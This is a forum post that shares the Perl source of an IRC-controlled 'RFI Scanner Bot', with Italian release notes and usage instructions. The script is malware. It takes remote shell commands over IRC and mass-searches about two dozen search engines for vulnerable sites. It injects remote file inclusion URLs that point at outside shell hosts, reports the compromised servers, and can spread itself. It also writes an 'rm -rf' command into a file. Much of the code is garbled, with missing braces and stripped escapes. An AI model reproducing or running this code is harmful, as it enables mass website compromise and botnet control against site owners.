RFI Scanner, .pl

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¬Black Viper
view post Posted on 25/11/2010, 19:12

Release Notes:
│ ══════════════════════════════════════
│ Ottimo programma per RFI Bot SCAN
│ Facile e pratico nell'utilizzo
│ ══════════════════════════════════════

ANNO:Luglio 2008
LINGUAGGIO: perl (.pl)


Shell Bot che serve appositamente per trovare siti vulnerabili al RFI... inoltre si ha la possibilitò di farlo connettere una o piu shell bot su IRCNET usando una propria Shell o una Shell Ownata ( bucata con accesso #root )

il comando per lanciarla e' il seguente:
perl alb.txt <canale in cui far apparire lo status dello scan> <server dove e' montata la shell>


## Albteam RFI Scanner Bot v2.4 ##
## By AlbTeam ##
## Copyleft July 2008 ##
## Usage: perl alb.txt <channel> <server> ##

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


my $id = " http://pianobarcafe.com/groups/idfx.txt";
my $shell = "http://jeannedawsonart.com/images/r57???";
my $spread = "";
#my $id = "http://pianobarcafe.com/groups/idfx.txt";
#my $shell = "http://jeannedawsonart.com/images/r57???";
@ircservers = (

my $chan1 = "#chan";
my $chan2 = "#chan";
my $chan3 = "#chan";
my $c1k = "scanner";
my $c2k = "scanner";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "[feel]".int(rand(1000))."";
my $ident = "figo".int(rand(50));
my $admin = "seph";

my $rfipidproc = 100;
my $spreadMode = 1;
my $secMode = 0;
my $secpwd = "5552";
my $spreadpwd = "55522";
my $killpwd = "55455";
my $chidpwd = "66958";
my $cmdpwd = "55848";
my @user_agent = &uagent();

$chan1 = "#alb"."$ARGV[0]" if $ARGV[0];
$ircd = "$ARGV[1]" if $ARGV[1];


open ($f1le,">","albteam.txt");
print $f1le "#!/usr/bin/perln";
print $f1le "exec("rm -rf *situs*");n";
close $f1le;

@pubhelp = (
"8,1 [X] 13!scan <bug> <dork> 0 Start the RFI Scanner ",
"8,1 [X] 13!response 0 Check the RFI Response ",

@help = (
"8,1 [X] 13!rfi <bug> <dork> -p <sites/proc> 0 Start the RFI Scanner ",
"8,1 [X] 13!response 0 Check the RFI Response ",
"8,1 [X] 13!chid <new rfi-id> 0 Change the RFI-Response ",
"8,1 [X] 13!cmd <bashline> 0 Execute command ",
"8,1 [X] 13/msg $nick !sec ON/OFF -p <pwd> 0 Enable or disable Security Mode ",
"8,1 [X] 13/msg $nick !spread ON/OFF -p <pwd> 0 Enable or disable Spread Mode ",
"8,1 [X] 13!info 0 Get infos about the Bot ",
"8,1 [X] 13/msg $nick !keluar -p <pwd> 0 Kill the bot "

@sechelp = (
"8,1 [X] 13/msg $nick !chid <new rfi-id> -p <pwd> 0 Change the RFI-Response ",
"8,1 [X] 13/msg $nick !cmd <bashline> -p <pwd> 0 Execute command ",

$k = 0;

my $sys = `uname -a`;
my $up = `uptime`;

if ( fork() == 0 ) { &irc( $ircd, $port, $chan1, $chan2, $nick ); }
else { exit; }

sub irc () {
my ($ircd, $port, $chan1, $chan2, $nick ) = @_;
$sock = IO::Socket::INET->new(PeerAddr => "$ircd",PeerPort => "$port",Proto => "tcp") or die "Could not connect to $ircd!n";
print $sock "NICK $nickrn";
print $sock "USER $ident localhost $ircd :coded by KoRn recoded by AlbTeamrn";

while ($line = <$sock>) {
#print "$line"; #Debugging Purposes
if ($spreadMode == 0) { $t5 = "OFF"; } else { $t5 = "ON"; }
if ($secMode == 0) { $y5 = "OFF"; } else { $y5 = "ON"; }
@info = (
"8,1 [X] 13Version 9:0,1 AlbTeam MuLti RFI Scanner Bot v8.8",
"8,1 [X] 13Author 9:0,1 KoRn ",
"8,1 [X] 13Uname -a9:0,1 $sys ",
"8,1 [X] 13Uptime 9:0,1 $up ",
"8,1 [X] 13Spread Mode9:0,1 $t5 ",
"8,1 [X] 13Security Mode9:0,1 $y5 "
@info2 = (
if ($line =~ /^PING :(.*)/) { print $sock "PONG :$1n"; }
if ($line =~ /004/) {
join1("$chan1 $c1k");
join1("$chan2 $c2k");
msg1("6R1eady to 6Scan..!");
if ($line =~ /PRIVMSG $chan2 :!help/) {
if ($secMode == 0) { @dhelp = @help; }
else { @dhelp = @sechelp; }
foreach my $e(@dhelp) { msg2("$e"); }
if ($line =~ /PRIVMSG $chan1 :!help/) {
foreach my $e(@pubhelp) { msg1("$e"); }
if ( $line =~ /PRIVMSG $chan2 :!info/) {
foreach my $n(@info) { msg2("$n"); }
if ( $line =~ /PRIVMSG $chan1 :!info/) {
foreach my $n(@info) { msg2("$n"); }
if ( $line =~ /PRIVMSG $chan1 :!response/ ) {
my $re = query($id);
my $re2 = query($shell);
if ( $re =~ /FeeLCoMz/ ) { $rid = "0OK"; }
else { $rid = "6ERROR"; }
if ( $re2 =~ /FaTaLisTiCz_Fx/ ) { $rsh = "0OK"; }
else { $rsh = "6ERROR"; }
msg1("8,1 [X] 13RFI Response is $rid ");
msg1("8,1 [X] 13RFI Shell is $rsh ");
if (($line=~ /PRIVMSG $chan2 :!chids+(.*) -p $chidpwd/) && ($secMode == 1)) {
$newid = $1;
$id = $newid;
msg2("12+ 5RFI Response 12changed ");
msg2("12+ 5New RFI Response:12 $id");
elsif (($line=~ /PRIVMSG $chan2 :!chids+(.*)/) && ($secMode == 0)) {
$newid = $1;
$id = $newid;
msg2("12+ 5RFI Response changed!");
msg2("12+ 5New RFI Response:12 $id");
if ($line=~ /PRIVMSG $nick :!keluar -p $killpwd/) {
msg1("5[!] 12Game Over!");
print $sock "QUIT";
exec("perl hapus.txt && pkill perl n");
if (($line=~ /PRIVMSG $nick :!cmds+(.*) -p $cmdpwd/) && ($secMode == 1) && (fork() == 0)) {
my $cmd = $1;
if ($cmd =~ /cd (.*)/) {
chdir("$1") || priv1("Can't change dir");
my @output = `$1`;
my $count = 0;
foreach my $out(@output) {
if ($count == 5) {
$count = 0;
priv1("12+12 $out");
elsif (($line=~ /PRIVMSG $chan2 :!cmds+(.*)/) && ($secMode == 0) && (fork() == 0)) {
my $cmd = $1;
if ($cmd =~ /cd (.*)/) {
$dir = $1;
chdir ($dir) || msg2("Can't change dir");
my @output = `$1`;
my $count = 0;
foreach my $out(@output) {
if ($count == 5) {
$count = 0;
msg2("12+12 $out");
if ($line=~ /PRIVMSG $nick :!secs+(.*) -p $secpwd/) {
$s = $1;
if ($s =~ /ON/) { $secMode = 1;$secstat = "ACTIVATED"; }
elsif ($s =~ /OFF/) { $secMode = 0;$secstat = "DISABLED"; }
msg2("12+ 12Security Mode is $secstat !!");
if ($line=~ /PRIVMSG $nick :!spreads+(.*) -p $spreadpwd/) {
$s = $1;
if ($s =~ /ON/) { $spreadMode = 1;$spreadstat = "ACTIVATED"; }
elsif ($s =~ /OFF/) { $spreadMode = 0;$spreadstat = "DISABLED"; }
msg2("12+ 12Spread Mode is $spreadstat !!");
if ($line=~ /PRIVMSG $chan2 :!tescaris+(.*)/) {
my @hclist = tescari($1);
my @hccl = unici(@hclist);
msg2("Hasil: ".scalar(@hclist)." Dibersihkan: ".scalar(@hccl));
foreach my $e(@hccl) {
if (($line =~ /PRIVMSG $chan1 :!rfis+(.*?)s+(.*)s+-p(.+[0-9])/) && (fork() == 0)) {
if ($3 > 100) { msg1("Could not more than 100 site/proc");exit(0); }
my ($bug, $dork, $rfipid) = ($1, $2, $3);
msg1("0,1 ![!]!13 RFI Scanner started. $rfipid sites/process 0![!]! ");
$d0rk = clean($dork);
msg1("13,1 ![Bug]!0 $bug ");
msg1("13,1 ![Dork]!0 $d0rk ");
my $n4me = $k . "situs.txt";
find($d0rk, $n4me);
rfi($bug, $n4me, $d0rk, $rfipid);
msg1("0,1 ![!]!13 RFI Scanner finished for0 $d0rk 0![!]! ");
if (($line =~ /PRIVMSG $chan1 :!scans+(.*?)s+(.*)/) && (fork() == 0)) {
my ($bug, $dork, $rfipid) = ($1, $2, $rfipidproc);
msg1("0,1 ![!]!13 RFI Scanner started. $rfipid sites/process 0![!]! ");
$d0rk = clean($dork);
msg1("13,1 ![Bug]!0 $bug ");
msg1("13,1 ![Dork]!0 $d0rk ");
my $n4me = $k . "situs.txt";
find($d0rk, $n4me);
rfi($bug, $n4me, $d0rk, $rfipid);
msg1("0,1 ![!]!13 RFI Scanner finished for0 $d0rk 0![!]! ");


sub find () {
my $dork = $_[0];
my $name = $_[1];
my @engine;
msg1("0,1 ![!]!13 Searching on 22 engines. Please wait.. 0![!]! ");
$engine[0] = fork();
if ( $engine[0] == 0 ) {
my @glist = google( $dork, $name );
my @gcl = unici(@glist);
$engine[1] = fork();
if ( $engine[1] == 0 ) {
my @g2list = google2( $dork, $name );
my @g2cl = unici(@g2list);
$engine[2] = fork();
if ( $engine[2] == 0 ) {
my @altlist = altavista( $dork, $name );
my @altcl = unici(@altlist);
$engine[3] = fork();
if ( $engine[3] == 0 ) {
my @ylist = yahoo( $dork, $name );
my @ycl = unici(@ylist);
$engine[4] = fork();
if ( $engine[4] == 0 ) {
my @asklist = ask( $dork, $name );
my @askcl = unici(@asklist);
$engine[5] = fork();
if ($engine[5] == 0) {
my @fblist = fireball($dork,$name);
my @fbcl = unici(@fblist);
$engine[6] = fork();
if ($engine[6] == 0) {
my @gigalist = gigablast($dork,$name);
my @gigacl = unici(@gigalist);
$engine[7] = fork();
if ($engine[7] == 0) {
my @lyclist = lycos($dork,$name);
my @lycl = unici(@lyclist);
$engine[8] = fork();
if ($engine[8] == 0) {
my @livelist = live($dork,$name);
my @livecl = unici(@livelist);
$engine[9] = fork();
if ($engine[9] == 0) {
my @virgilist = virgilio($dork,$name);
my @virgicl = unici(@virgilist);
$engine[10] = fork();
if ($engine[10] == 0) {
my @uollist = uol($dork,$name);
my @uolcl = unici(@uollist);
$engine[11] = fork();
if ($engine[11] == 0) {
my @mammalist = mamma($dork,$name);
my @mammacl = unici(@mammalist);
$engine[12] = fork();
if ($engine[12] == 0) {
my @hotlist = hotbot($dork,$name);
my @hotcl = unici(@hotlist);
$engine[13] = fork();
if ($engine[13] == 0) {
my @clustylist = clusty($dork,$name);
my @clustycl = unici(@clustylist);
$engine[14] = fork();
if ( $engine[14] == 0 ) {
my @alist = alltheweb( $dork, $name );
my @acl = unici(@alist);
$engine[15] = fork();
if ( $engine[15] == 0 ) {
my @eurolist = euroseek( $dork, $name );
my @eurocl = unici(@eurolist);
$engine[16] = fork();
if ( $engine[16] == 0 ) {
my @webdelist = webde( $dork, $name );
my @webcl = unici(@webdelist);
$engine[17] = fork();
if ( $engine[17] == 0 ) {
my @dmozlist = dmoz( $dork, $name );
my @dmozcl = unici(@dmozlist);
$engine[18] = fork();
if ( $engine[18] == 0 ) {
my @webcrawlist = webcrawler( $dork, $name );
my @webcrawcl = unici(@webcrawlist);
$engine[19] = fork();
if ( $engine[19] == 0 ) {
my @fzlist = fazzle( $dork, $name );
my @fzcl = unici(@fzlist);
$engine[20] = fork();
if ( $engine[20] == 0 ) {
my @ablist = about($dork,$name);
my @abcl = unici(@ablist);
$engine[21] = fork();
if ( $engine[21] == 0 ) {
my @netlist = netscape($dork,$name);
my @netcl = unici(@netlist);
$engine[22] = fork();
if ( $engine[22] == 0 ) {
my @infolist = infospace($dork,$name);
my @infocl = unici(@infolist);
foreach my $e(@engine){ waitpid($e,0); }
msg1("0,1 ![!]!13 Search finished for0 $d0rk 0![!]! ");

sub rfi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $rfipid = $_[3];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = <filez> ) {
$a =~ s/n//g;
push( @tot, $a );
close filez;
my @toexploit = unici(@tot);
msg1("0,1 ![!]!13 Total :0 ".scalar(@tot)." 8sites. Cleaned:0 ".scalar(@toexploit)." 8sites. 0![!]! ");
msg1("0,1 ![!]!13 Begin exploiting. Please wait.. 0![!]! ");
foreach my $site (@toexploit) {
my $test = "http://" . $site . $bug . $id . "?";
#print "$testn";
if ( $count % $rfipid == 0 ) {
foreach my $f(@forks){ waitpid($f,0); }
$num = 0;
if($count %100 == 0){
msg1("8,1 [X]15 ".$count." 0?8 ". scalar(@toexploit). " 13[x] ");
#msg3("12?12 ". $count. "12 ".$site."");
if($forks[$num] == 0){
my $test = "http://".$site.$bug.$id."?";
my $print = "http://".$site.$bug."8".$shell."?";
my $re = query($test);
if ( $re =~ /FeeLCoMzOFF/ ) {
msg2("8,1 .:[7SAFE OFF13]:.8 [$os]0 [ $print 0]");
msg2("13,1 [Uname]:15[ $un ]");
msg2("13,1 [User]:15[ $id1 ]");
msg1("8,1 .:[7SAFE OFF13]:.8 [$os]0 [ $print 0]");
msg1("13,1 [Uname]:15[ $un ]");
msg1("13,1 [User]:15[ $id1 ]");
msg1("13,1 [HDD]:15[ Free:13 $free 15Used:13 $used 15Total:13 $all 15] ");
#2nd Chan
if ( $spreadMode == 1 ) {
msg2("0,1 ![!]!13 Spreadding.. ");
my $test2 = "http://" . $site . $bug . $spread . "?";
my $reqz = query2($test2);
elsif ( $re =~ /FeeLCoMzON/ ) {
#2nd Chan
msg2("8,1 .:[13SAFE ON13]:.8 [$os]0 [ $print 0]");
msg1("8,1 .:[13SAFE ON13]:.8 [$os]0 [ $print 0]");
msg1("13,1 [Uname]:15[ $un ]");
msg1("13,1 [User]:15[ $id1 ]");
msg1("13,1 [HDD]:15[ Free:13 $free 15Used:13 $used 15Total:13 $all 15] ");
if ( $spreadMode == 1 ) {
msg2("0,1 ![!]!13 Spreadding.. ");
my $test2 = "http://" . $site . $bug . $spread . "?";
my $reqz = query2($test2);
foreach my $f(@forks){ waitpid($f,0); }


sub tescari () {
my @list;
my $tesquery = $_[0];
my $key = $_[1];
for ($p = 0;$p <= 1; $p++) {
my $re = query($tesquery);
print $cp "$ren";
if ($re =~ /<title>404 Not Found</title>/) {
msg2("404 for $tesquery");
return @list;
#while ($re =~ m/<h2 class=r><a href="?http://([^>"]*)//g) { #google
#while($re =~ m/<a id="(.+?)" href="http://(.*?)" onmousedown=/g){ #ask
#while($re =~ m/<a id="(.+?)" href="http://(.+?)"/g){ #ask
while ( $re =~ m/26u=(.+?)%26w=/g ) { #yahoo
my $k = $1; #google,yahoo
#my $k = $2; #ask
if ($k !~ /google|ask.com/) {
my @grep = links($k);
open( $nf, ">>", "teshasil.txt");
foreach my $k (@grep) {
print $nf "$kn";
close $nf;
push(@list, @grep);
return @list;

sub GoogleDomain(){
my @ret = (
"com.tr","com.tw","com.ua","co.uk","hu" );
return @ret;
## GOOGLE ##
sub google () {
my @gsites;
my $key = $_[0];
my $name = $_[1];
my $gtest = ("http://www.google.co.id/search?q=feelcomz");
my $ret = query($gtest);
if ($ret =~ /kita akan bertemu kembali di Google/) {
msg1("0,1 ![!]!12 Banned by Google.co.id 0![!]! ");
else {
@gsites = gfind($key,$name);
return @gsites;

sub google2 () {
my @g2sites;
my $key = $_[0];
my $name = $_[1];
my $gtest = ("http://www.google.com/search?q=feelcomz");
my $ret = query($gtest);
if ($ret =~ /see you again on Google/) {
msg1("0,1 ![!]!12 Banned by Google.com 0![!]! ");
else {
@g2sites = gfind2($key,$name);
return @g2sites;

sub gfind () {
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 5000; $p += 50) {
my $g0gle = ("http://www.google.co.id/search?hl=id&q=".key($key)."&num=50&sa=N&start=".$p);
my $gr = query($g0gle);
while ($gr =~ m/<h2 class=r><a href="?http://([^>"]*)//g) {
my $k = $1;
if ($k !~ /google/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "google1.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($gr !~ /Berikutnya/) {
msg3("5(!)12 No more on Google.Co.Id!");
return @list;
return @list;

sub gfind2 () {
my @list;
my $key = $_[0];
my $name= $_[1];
my @dom = &GoogleDomain();
for ($p = 0;$p < 5000; $p += 50) {
my $domain = $dom[rand(scalar(@dom))];
my $g0gle = ("http://www.google.".$domain."/search?q=".key($key)."&num=50&sa=N&start=".$p);
my $gr = query($g0gle);
while ($gr =~ m/<h2 class=r><a href="?http://([^>"]*)//g) {
my $k = $1;
if ($k !~ /google/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "google2.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;
## YAHOO ##
sub yahoo () {
my @ysites;
my $key = $_[0];
my $name = $_[1];
my $ytest = ("http://search.yahoo.com/search?p=hello&ei=UTF-8&fr=yfp-t-501&pstart=1&b=1");
my $ret = query($ytest);
if ($ret =~ /We did not find results for/) {
return @ysites;
elsif ($ret =~ /title="Yahoo! Search results for hello"/) {
@ysites = yfind($key,$name);
return @ysites;
else {
msg1("0,1 ![!]!12 Banned by Yahoo! Bypassing.. 0![!]! ");
@ysites = yfind2($key,$name);
return @ysites;

sub yfind() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $ylink = ("http://search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $re = query($ylink);
while ( $re =~ m/26u=(.+?)%26w=/g ) {
my $k = $1;
if ($k !~ /yahoo|wikipedia.org/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "yahoo.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
return @lst;

sub yfind2() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $ylink = ("http://id.search.yahoo.com/search?p=".key($key)."&pstart=1&b=".$b);
my $re = query($ylink);
while ( $re =~ m/26u=(.+?)%26w=/g ) {
my $k = $1;
if ($k !~ /yahoo|wikipedia.org/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "yahoo.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
return @lst;

sub euroseek () {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $p = 0 ; $p <= 8000 ; $p += 10 ) {
my $gp = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$p."&string=".key($key));
my $re = query($gp);
while ($re =~ m/<a href="http://(.+?)" class="searchlinklink">/g ) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "euroseek.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
if ($k !~ /">Next</a>/) {
msg3("5(!)12 No more on Euroseek!");
return @lst;
return @lst;
sub alltheweb() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $i = 0 ; $i <= 5000 ; $i += 100 ) {
my $All = ( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $re = query($All);
while ( $re =~ m/<span class="?resURL"?>http://(.+?)</span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "alltheweb.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
if ( $re !~ /class="rnavLink">Next/ ) {
msg3("5(!)12 No more on Alltheweb!");
return @lst;
return @lst;
sub altavista() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ($b = 1;$b <= 5000;$b += 100) {
my $Alt = ("http://www.altavista.com/web/results?itag=ody&q=".key($key)."&kgs=0&kls=0&nbq=100&stq=".$b);
my $re = query($Alt);
while ( $re =~ m/<span class=ngrn>(.+?) </span>/g ) {
if ( $1 !~ /yahoo/ && $1 !~ /Altavista/ ) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "altavista.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
if ( $re !~ /target="_self">Next/ ) {
msg3("5(!)12 No more on Altavista!");
return @lst;
return @lst;

## ASK ##
sub ask () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $askt = ("http://www.ask.com/web?q=".key($key));
my $asktest = query($askt);
if ($asktest =~ /match with any Web results/) {
msg3("No result on ask!");
return @lst;
else {
for ($p=0;$p<=100;$p++){
my $asklink = ("http://www.ask.com/web?q=".key($key)."&o=0&l=dir&page=".$p);
my $re = query($asklink);
while($re =~ m/<a id="(.+?)" href="http://(.+?)"/g){
my $k = $2;
if ($k !~ /ask.com|wikipedia/){
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "ask.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
close $filez;
push( @lst, @grep );
if ($re !~ /style="text-decoration:none" >Next/) {
msg3("5(!)12 No more on Ask!");
return @list;
return @lst;
sub gigablast() {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $max = 10000;
my $gigablastlink = ("http://www.gigablast.com/search?q=".key($key)."&n=".$max);
my $re = query($gigablastlink);
while($re =~ m/<a class="result-title" href="http://(.+?)">/g) {
my $k = $1;
if ($k !~ /fireball/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "gigablast.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
return @lst;
sub fireball(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 200; $p++) {
my $re = query("http://suche.fireball.de/cgi-bin/pursuit?pag=".$p."&query=".key($key)."&cat=fb_web&enc=utf-8");
while ($re =~ m/<a href="http://(.+?)" target/g) {
my $k = $1;
if ($k !~ /fireball|lycos/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "fireball.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ /class="nav">Vorw/) {
msg3("5(!)12 No more on Fireball!");
return @list;
return @list;
## WEB.DE ##
sub webde () {
my $key = $_[0];
my $name = $_[1];
my @lst;
for $p(1..100){
my $webdelink = ("http://suche.web.de/search/web/?pageIndex=".$p."&su=".key($key)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web");
my $re = query($webdelink);
while($re =~ m/href="http://(.+?)">/g) {
my $k = $1;
if ($k !~ //search/web|web.de|access_log|accesswatch|awstats" class="neww"/){
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "webde.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push( @lst, @grep );
return @lst;
## LIVE ##
sub live () {
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 1000; $p += 10) {
my $live = ("http://search.live.com/results.aspx?q=".key($key)."&first=".$p."&FORM=PORE");
my $re = query($live);
while ($re =~ m/<h3><a href="http://(.+?)" onmousedown=/g) {
my $k = $1;
if ($k !~ /msn|microsoft|live|accesswatch|awstats/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "live.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;
sub virgilio(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 1000; $p += 10) {
my $re = query("http://ricerca.alice.it/ricerca?qs=".key($key)."&filter=1&site=&lr=&hits=10&offset=".$p);
while ($re =~ m/<a href="http://(.+?)" class=/g) {
my $k = $1;
if ($k !~ /virgilio|accesslog|accesswatch|awstats/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "virgilio.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;
## UOL ##
sub uol(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 1000; $p += 10) {
my $re = query("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$p);
while ($re =~ m/<a href="http://([^>"]*)/g) {
my $k = $1;
if ($k !~ /busca|uol|yahoo|accesswatch|awstats/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "uol.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ /class="next"/) {
msg3("5(!)12 No more on Uol!");
return @list;
return @list;
## MAMMA ##
sub mamma(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 1000; $p += 50) {
my $re = query("http://mamma.com/Mamma?utfout=1&query=".key($key)."&qtype=0&rpp=50&cb=Mamma&index=".$p);
while ($re =~ m/http://(.+?)</span>/g) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "mamma.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ /Next</font>/) {
msg3("5(!)12 No more on Mamma!");
return @list;
return @list;
## HOTBOT ##
sub hotbot(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p < 100; $p++) {
my $re = query("http://www.hotbot.com/?query=".key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$p);
while ($re =~ m/<a href="http://(.*?)" onmouseover/g) {
my $k = $1;
if ($k !~ /hotbot/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "hotbot.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ /<p class="nxt">/) {
msg3("5(!)12 No more on Hotbot!");
return @list;
return @list;
## LYCOS ##
sub lycos(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 100; $p++) {
my $re = query("http://search.lycos.com/?query=".key($key)."&page2=".$p."&tab=web");
while ($re =~ m/<a href="http://([^>"]*)/g) {
my $k = $1;
if ($k !~ /lycos|hotbot/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "lycos.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;

## CLUSTY ##
sub clusty(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p < 1000; $p += 100) {
my $re = query("http://clusty.com/search?query=".key($key)."&v:state=root|root-".$p."-100|0");
while ($re =~ m/<a target="_top" href="http://([^>"]*)/g) {
my $k = $1;
if ($k !~ /clusty/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "clusty.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ /<a class="listnext"/) {
msg3("5(!)12 No more on Clusty!");
return @list;
return @list;

sub dmoz(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 1000; $p += 20) {
my $re = query("http://dmoz.org/search?search=".key($key)."&utf8=1&start=".$p);
while ($re =~ m/<li><a href="http://(.*?)"/g) {
my $k = $1;
if ($k !~ /clusty/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "dmoz.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ />Next</a>/) {
msg3("5(!)12 No more on dmoz!");
return @list;
return @list;

sub webcrawler(){
my @list;
my $key = $_[0];
my $name= $_[1];
my $b = 0;
for ($p = 0;$p <= 5000; $p += 100) {
my $re = query("http://www.webcrawler.com/webcrawler/ws/redir/qcat=Web/qkw=".key($key)."/qcoll=relevance/zoom=off/bepersistence=true/qi=".$p."/qk=50/page=".$b."/_iceUrlFlag=11?_IceUrl=true");
while ($re =~ m/http://(.*?)/g) {
my $k = $1;
if ($k !~ /webcrawler|google/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "webcrawler.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
if ($re !~ /wsPagerNext/) {
msg3("5(!)12 No more on Webcrawler!");
return @list;
return @list;

sub fazzle(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 10; $p++) {
my $re = query("http://www.fazzle.com/search?SearchString=feelcomz");
while ($re =~ m/<a Class=clsLink href="http://(.*?)"/g) {
my $k = $1;
if ($k !~ /fazzle/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "fazzle.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;

sub about(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 10; $p++) {
my $re = query("http://search.about.com/fullsearch.htm?terms=".key($key)."&pg=".$p."&SUName=www");
while ($re =~ m/<a href="http://(.*?)"/g) {
my $k = $1;
if ($k !~ /search.about/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "about.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;

sub netscape(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 10; $p++) {
#my $re = query("http://search.netscape.com/search/search?query=".key($key)."&page=".$p."&nt=null&y=0&fromPage=NSCPIndex&x=0&st=webresults");
my $re = query("http://search.netscape.com/search/search?query=".key($key)."&page=".$p."&y=0&x=0&st=webresults");
while ($re =~ m/url">http://(.*?)</p>/g) {
my $k = $1;
if ($k !~ /search.netscape/) {
my @grep = links($k);
open( $filez, ">>", $name );
